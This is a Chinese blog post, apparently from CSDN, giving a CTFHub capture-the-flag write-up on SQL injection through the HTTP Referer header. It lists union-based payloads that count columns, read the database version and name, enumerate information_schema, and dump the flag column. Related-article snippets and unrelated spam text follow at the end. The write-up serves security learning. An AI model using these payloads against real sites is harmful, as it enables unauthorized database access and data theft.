CTFHub | Refer注入

48 篇文章 35 订阅
订阅专栏

 0x00 前言

        CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

        

        

0x01 题目描述

Refer注入:

        (无)

网页显示内容

        
       

0x02 解题过程

        根据题目显示内容,此题和上一题一致,需要在 Refer 请求头中进行 SQL 注入。那么直接使用 burp suite 抓包工具抓取题目网站的信息,并将抓取到的数据发送给重放器。在 Refer 请求中使用 payload 进行测试,发现此题存在 Refer 注入。那么直接根据注入流程进行注入,最后发现此题 flag 存在于 ncdiyxjtck 数据中。
        

老规矩,直接使用burp suite抓包工具抓取题目网站的信息

        

这次为了方便查看,将抓取到的数据发送给重放器

        

发现抓到的信息中没有Refer请求,那么可以直接写入Refer请求进行测试

Referer: 1 and 1 = 1    #注意Refer请求写入信息名称为Referer

        

继续写入Referer请求中使用进行测试,发现此题存在Refer注入

Referer: 1 and 1 = 2

        

使用order by 判断字段数量,从order by 1开始

Referer: 1 order by 1

判断字段2,使用order by 2

Referer: 1 order by 2

判断字段3,使用order by 3,这里无回显,那么字段数量为2列

Referer: 1 order by 3

知道字段数量为2后,可以查看数据库位置,使用union select 1,2查看未发现数据

Referer: 1 union select 1,2

        

判断数据可能不存在数据库中,将1改为0查看数据,其他符号也可以

Referer: 0 union select 1,2

        

修改2为version(),查看数据库版本,发现数据库版本为MariaDB 10.3.22

Referer: 0 union select 1,version()

        

ⅩⅠ修改2为database(),查看数据库名,发现数据库版本为sqli

Referer: 0 union select 1,database()

        

ⅩⅡ查看全部数据库名

Referer: 0 union select 1,group_concat(schema_name)from information_schema.schemata

        

ⅩⅢ在全部数据库名中发现sqli,最后在sqli数据库中发现cirdpxhnev和news两个表名

Referer: 0 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

        

ⅩⅣ先查看cirdpxhnev表中的全部字段名,发现一个数据名为ncdiyxjtck

Referer: 0 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='cirdpxhnev'

        

ⅩⅤ查看数据ncdiyxjtck中的内容,发现此题flag

Referer: 0 union select 1,group_concat(ncdiyxjtck) from sqli.cirdpxhnev

        

        

0x03 Refer 注入常见的问题

1.Refer 和 Referer

        需要注意的是,Refer 只是注入名称,而 Referer header 的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上 Referer ,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。

2.重放 Referer 注入无回显

        有小伙伴私信我,为什么我使用 burp suite 工具进行重放的时候,页面没有正常回显。我第一次使用 burp suite 工具的重放器也犯过此类错误,就是写入一个请求时在其数据的空白行中写入数据。需要注意的是,这个空白行也算抓取到的数据。

例如,重放一个演示请求,数据为 error ,写入位置为抓取到的数据空白行中。重放发现页面没有正常回显。

 

那么在写入的数据后面加入一行空白行,重新执行重放,此时的页面可以正常回显。

         

        

0x04 参考文献

[1].mdn web docs. Referer[EB/OL]. [2022-11-26]. https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/Referer.

[2].百度百科. HTTP_REFERER[EB/OL]. [2022-11-26]. https://baike.baidu.com/item/HTTP_REFERER/5358396.

[3].老司机开代码. Less19 (referer注入)[EB/OL]. [2022-11-26]. https://blog.csdn.net/weixin_43901998/article/details/107021685.

        

        

0x05 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

24-4 SQL 注入 - http头注入referer注入
weixin_43263566的博客
02-28 444
在代码中,通过检查用户输入的用户名和密码,然后构造SQL语句查询数据库中是否存在匹配的用户记录。如果查询成功,则会将referer和IP地址插入到referers表中,并显示用户的referer信息。如果查询失败,则会显示错误信息,并显示一个图片。这段代码是一个简单的演示网页,主要用于演示头部注入(Header Injection)和基于错误的SQL注入攻击。用户可以在表单中输入用户名和密码,然后提交到服务器端进行处理。
CTFHUB-web-SQL注入
ookami6497的博客
11-29 857
CTFHUB SQL
CTFHub-referer注入
m0_51589948的博客
05-19 883
referer注入 根据提示寻找referer,对其进行bp抓包,并发包到repeaterreferer进行注入判断 -1 union select 1,2 在注入后回显并显示内容,判断为Cookie注入,按照正常的注入流程获取flag -1 union select database(),1 查库名 然后查询数据库的表名 -1 union select 1,group select(table_name) feom information_schema.table where table_sche
CTFHub - Refer注入
Have_a_great_day的博客
09-12 773
table_schema=database() :table_schema表示要筛选的表的模式(也就是数据库的名称),而database()是MySQL内置函数,返回当前连接的数据库名称。information_schema:是 information_schema 数据库中的一个表,用于存储关于数据库中所有表的信息,例:表名、所属数据库、表类型、创建时间等。group_concat(列或表达式):函数将指定的列或表达式的值按照默认的逗号分隔符连接起来,并返回一个合并的字符串作为结果。
CTFhub Refer注入
plant1234的博客
06-18 1394
Refer注入: 这道题首先我自己一开始也有点乱,找不到referer在哪里 但根据大佬的博客:https://blog.csdn.net/qq_37450949/article/details/117003065 提示的话知道,referer的一些知识: HTTP_REFERER简介 HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 这句话的意思就是,只有当你向浏
CTFHUB-Cookie注入
Web学习之路
03-28 238
cookie啊
CTFHub——SQL注入
Aquarius_ego的博客
05-05 1749
CTFHub——SQL注入(报错注入、布尔盲注、时间盲注、MySQL结构、Cookie注入、UA注入Refer注入、过滤空格)
CTFHub SQL注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-09 1148
ctfhub的SQL注入中的flag是动态生成的 1、整数型注入 1、按照提示输入1 发现直接给出了SQL语句,根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数 首先使用order by 3 ,页面无回显,改为2之后页面显示正确。因此判断当前数据库当前表,共有2个字段。 3、使用联合查询,判断页面显示位 首先将id改为一个不存在的纸,根据联合查询的特性,就会返回11111,222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数
初识CTF Day2 CTFHUB密码口令&SQL注入
suxinAL的博客
09-27 921
前言 接着上次的继续往下做 git泄露结束了,现在开始看svn和hg 正文 首先看一下信息泄露部分的svn和hg 这里使用到一个工具dvcs-ripper 下载地址如下 https://github.com/kost/dvcs-ripper.git (注意:该工具一定要配置环境,具体如下图,或者查看readme.md) 安装好工具就简单了,我是在kali虚拟机里进行使用的 具体指令如下 cd dvcs-ripper-master ./rip-svn.pl -v -u http://challenge-d
CTFHub技能树.Web.SQL注入 WriteUp与SQL注入学习笔记
qq_45716477的博客
04-19 598
目录Level 1整数型注入字符型注入报错注入布尔盲注时间盲注欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Level 1 整数型注入 输入1 and 1=1 和1 and 1=2 输
ctfhub Refer注入
weixin_43326436的博客
06-10 942
1,实验环境 ctfhubsql注入 2.工具 火狐浏览器,火狐浏览器插件hackbar(可以安装,百度。。。) 直接抓包,但是会看到没有我们想要的refer这个字样,我们在hackerbar里面输出需要的参数,id=1,提交时抓包,抓到我们所需要的字样。 3.在bp中refer字段这里进行爆库,输入123 union select (database()),2 # 后点击forward放包步骤接下来一样) 显示出了数据库是sqli 继续爆表 123 union select (select group_c
[CTFhub]CTFhub技能树SQL注入——Refer注入
KKleeeaa的博客
04-05 564
提示:本文章仅限学习参考,切勿用于非法用途。
CTFHub-referer注入-wp
z1moq的博客
05-18 303
referer注入 注入点如图 测试出能够注入后使用字符型注入语法即可 sqlmap做法同UA注入 HTTP_REFERER简介 HTTP_REFERER简介 HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 ...
CTFHUB-WEB-SQL注入-Refer注入
weixin_43486981的博客
08-11 1051
题目: 靶机环境: 使用burp suite 抓包,发现包信息中并没有refer字段。 根据提示,添加referer字段,进行注入 查看显示位 求数据库名 求表名 求列名 求字段值,得到flag
CTFHUB-技能树-Web题-SQL注入-Mysql结构-Refer注入
最新发布
Static______的博客
04-09 1421
HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。用bp抓到包后,将页面中的数据保存到一个txt文件中,用sqlmap爆破(根据reger注入level需要大于三)也就是说,只有当你向浏览器发送请求时,才会带上referer。得到两个表名,第一张表看名字像是自定义的表,尝试爆破第一张表。-p 指定参数,这里为 -p “id”1,2都显示,有两个回显字段。
ctfhub技能树—SQL注入referer注入
Naptmn的博客
02-07 1317
referer是什么? HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 还是bp抓包 但是这次包中没有referer这个部分 所以我们需要添加一下(在headers中选add) 之后就可以在refere开始常规注入了 1、找位点 2、数据库名 3、表名 4、列名 5、查看数据 得到flag ...
CTFHUB-SQL注入-refer注入
u014794539的博客
07-10 488
考点 sql refer注入 过程分析 hackbar发送refer 然后发送repeater抓包 GET / HTTP/1.1 Host: challenge-966dbd291ece3e1d.sandbox.ctfhub.com:10800 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: text/html,application/xhtml+xml
CTFHUB——Cookie、User-Agent、Referer注入 writeup
wuuconix's blog
08-29 847
背景 我们一般做sql注入的时候,注入点一般都是一个文本框,然后我们可以通过输入某种特殊的语句来获得数据库中的信息,但是有时候这种注入点可不一定给你一个文本框,而可能在请求包中的其他地方。 接下来我分享一下CTFHUB中的三道题,它们的注入点分别是请求包中的Cookie、User-Agent和Referer。它们只是注入点不同,基于的的注入方式都是最基本的union联合注入。所以它们的payload都十分简单和相似。 在这次做题过程中,我还尝试了强大的sqlmap,成功得到了一些结果。 SQL注入——Coo
CTFHub(UA注入Refer注入
sGanYu
07-27 2921
UA注入 UA是什么?UA也称User-Agent,当用户发起一个请求时,网站会通过判断 UA的数据,如(名称,版本,浏览器内核,内核版本)等等,来给不同的操作系统,不同的浏览器发送不同的页面 一般来说,普通的 SQL 注入是对 URL 及参数进行的,但这里攻击者却将 SQL 查询语句隐藏在了 HTTP 头部的User-Agent字段之中 ,也称UA注入 查询中用到的参数: column_name:列的名称 Information_schema.columns:表示所有的列的信息 Informa
SIP协议扩展:REFER方法在呼叫转移中的应用
"该资源是一篇关于SIP协议扩展研究的学术论文,主要探讨了SIP事件扩展中的REFER方法,并分析了osip2和eXosip协议栈,特别是REFER在eXosip中的实现。文章指出REFER方法的使用可以促进多种增值服务的实现,如呼叫转移...
写文章

热门文章

  • Python笔记 | 角谷猜想 13041
  • 汇编语言 | 基础知识 10596
  • 保姆级 | 最新Burpsuite安装配置 8576
  • 保姆级 | Python设置py2和py3共存 7575
  • CTFHub | 弱口令 6182

分类专栏

  • 环境配置 6篇
  • CTF精进之路 48篇
  • 漏洞复现 1篇
  • 运维指南
  • VMware 1篇
  • Vulnhub 1篇
  • C语言笔记 4篇
  • Hadoop生态 3篇
  • CACM
  • #数据结构
  • 渗透测试 8篇
  • 安全工具 1篇
  • 反涉网犯罪研究 1篇
  • Python 5篇
  • 汇编语言 2篇
  • 文档手册 1篇
  • Error 2篇
  • 网络安全 2篇
  • 运维
  • CS免杀
  • 杂谈

最新评论

  • 反涉网犯罪研究 | 电商平台自动收货代码审计

    2401_86935466: 在这里

  • 保姆级 | XSS Platform环境搭建

    尼泊罗河伯: 您好,试试重新配置Nginx, [code=javascript] rewrite "^/([0-9a-zA-Z]{6})$" /index.php?do=code&urlKey=$1 last; rewrite "^/do/auth/(\w+?)(/domain/([\w\.]+?))?$" /index.php?do=do&auth=$1&domain=$3 last; rewrite "^/register/(.*?)$" /index.php?do=register&key=$1 last; rewrite "^/register-validate/(.*?)$" /index.php?do=register&act=validate&key=$1 last; [/code]

  • 保姆级 | XSS Platform环境搭建

    为几何欢: [code=plain] ######################## default ############################ server { listen 80; server_name _; access_log /data/wwwlogs/access_nginx.log combined; root /data/wwwroot/default; index index.html index.htm index.php; #error_page 404 /404.html; #error_page 502 /502.html; rewrite "^/([0-9a-zA-Z]{6})$" /index.php?do=code&urlKey=$1 last; rewrite "^/do/auth/(\w+?)(/domain/([\w\.]+?))?$" /index.php?do=do&auth=$1&domain=$3 last; rewrite "^/register/(.*?)$" /index.php?do=register&key=$1 last; rewrite "^/register-validate/(.*?)$" /index.php?do=register&act=validate&key=$1 last; location /nginx_status { stub_status on; access_log off; allow 127.0.0.1; deny all; } location ~ [^/]\.php(/|$) { #fastcgi_pass remote_php_ip:9000; fastcgi_pass unix:/dev/shm/php-cgi.sock; fastcgi_index index.php; include fastcgi.conf; } location ~ .*\.(gif|jpg|jpeg|png|bmp|swf|flv|mp4|ic [/code]

  • 保姆级 | XSS Platform环境搭建

    尼泊罗河伯: 可能是 0x07 配置伪静态页面 这个步骤出问题了,截图我看一下配置文件。

  • CTFHub | 远程包含

    尼泊罗河伯: 您好有截图吗,看一下具体是什么情况

大家在看

  • Linux---IPC通信之 ---有名管道fifo讲解 248
  • 如何看待AI技术的应用场景 370
  • 虚拟化技术
  • 苍穹外卖--开发记录day07 783
  • 大数据-183 Elasticsearch - 原理剖析 - 并发冲突处理机制剖析、分布式数据一致性剖析 907

最新文章

  • 保姆级 | Windows 复古风格终端样式设置
  • CTFHub | DOM反射
  • CTFHub | 存储型
2024年4篇
2023年36篇
2022年49篇

目录

目录

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43元 前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼泊罗河伯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或 充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值

玻璃钢生产厂家主题玻璃钢人物雕塑出厂价格临汾园林玻璃钢雕塑厂家定制玻璃钢坐凳雕塑闵行区专业玻璃钢雕塑免费咨询通许玻璃钢雕塑价格长宁区小型玻璃钢雕塑厂家供应重庆抽象玻璃钢雕塑定制玻璃钢雕塑饰品厂家松原景区玻璃钢雕塑定制新乡不锈钢玻璃钢彩绘雕塑制作唐山玻璃钢花盆批发价格表杭州环保玻璃钢雕塑定制好用的玻璃钢恐龙雕塑张掖玻璃钢卡通座椅雕塑黄山特色玻璃钢雕塑哪家便宜优质量的玻璃钢雕塑影视卡通关羽玻璃钢雕塑铜陵商场美陈公司商场柜台夏季美陈优质的玻璃钢蔬菜雕塑周口公园玻璃钢卡通雕塑价格肇庆玻璃钢卡通雕塑制作优惠的玻璃钢雪山雕塑河南超市商场美陈批发价黄浦区耐高温玻璃钢雕塑天水抽象人物玻璃钢雕塑哪家好玻璃钢雕塑厂家供应商辽宁卡通玻璃钢雕塑定制格尔木玻璃钢雕塑山西人物玻璃钢雕塑定做价格香港通过《维护国家安全条例》两大学生合买彩票中奖一人不认账让美丽中国“从细节出发”19岁小伙救下5人后溺亡 多方发声单亲妈妈陷入热恋 14岁儿子报警汪小菲曝离婚始末遭遇山火的松茸之乡雅江山火三名扑火人员牺牲系谣言何赛飞追着代拍打萧美琴窜访捷克 外交部回应卫健委通报少年有偿捐血浆16次猝死手机成瘾是影响睡眠质量重要因素高校汽车撞人致3死16伤 司机系学生315晚会后胖东来又人满为患了小米汽车超级工厂正式揭幕中国拥有亿元资产的家庭达13.3万户周杰伦一审败诉网易男孩8年未见母亲被告知被遗忘许家印被限制高消费饲养员用铁锨驱打大熊猫被辞退男子被猫抓伤后确诊“猫抓病”特朗普无法缴纳4.54亿美元罚金倪萍分享减重40斤方法联合利华开始重组张家界的山上“长”满了韩国人?张立群任西安交通大学校长杨倩无缘巴黎奥运“重生之我在北大当嫡校长”黑马情侣提车了专访95后高颜值猪保姆考生莫言也上北大硕士复试名单了网友洛杉矶偶遇贾玲专家建议不必谈骨泥色变沉迷短剧的人就像掉进了杀猪盘奥巴马现身唐宁街 黑色着装引猜测七年后宇文玥被薅头发捞上岸事业单位女子向同事水杯投不明物质凯特王妃现身!外出购物视频曝光河南驻马店通报西平中学跳楼事件王树国卸任西安交大校长 师生送别恒大被罚41.75亿到底怎么缴男子被流浪猫绊倒 投喂者赔24万房客欠租失踪 房东直发愁西双版纳热带植物园回应蜉蝣大爆发钱人豪晒法院裁定实锤抄袭外国人感慨凌晨的中国很安全胖东来员工每周单休无小长假白宫:哈马斯三号人物被杀测试车高速逃费 小米:已补缴老人退休金被冒领16年 金额超20万

玻璃钢生产厂家 XML地图 TXT地图 虚拟主机 SEO 网站制作 网站优化